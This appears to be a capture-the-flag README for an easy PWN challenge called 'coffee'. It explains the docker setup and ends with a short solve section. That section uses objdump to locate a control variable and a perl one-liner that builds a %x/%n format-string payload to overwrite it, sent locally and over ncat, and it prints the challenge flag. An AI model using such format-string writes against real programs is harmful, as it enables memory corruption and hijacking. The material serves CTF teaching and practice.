# coffee
OMG I found creating my own GNU programs soo easy. Just look at that **tee** analog.

[nc mctf.ru 8001]

# Difficulty
Easy

# Type
PWN

# Pre-start

`8001` - NCAT FOR BINARY
`9001` - DOWNLOAD BINARY

Binary: **./app/coffee**

But, there's compilation script **./run.sh** which contains gcc command to build

# Launch

    # docker-compose build
    # docker-compose up

# Solve
First of all we need to get address of *debug_flag* which is control var:

    $ objdump -t ./coffee | grep debug_flag # Gets address of control flow variable

Then guess offset (dwords) in stack where u put ur address and use %n to write to it

    $ perl -e 'print "AAAA" . "\x2c\xc0\x04\x08" . (" %x " x 11) . " %n\n"' | ./coffee 
    $ perl -e 'print "AAAA" . "\x2c\xc0\x04\x08" . (" %x " x 11) . " %n\n"' | ncat localhost 5555

To check if working:
    
    $ python3 exploit.py r

# Flag
MCTF{Not-S0_FA$T-GnU-l0v3rXD}

# P.S.
nothing
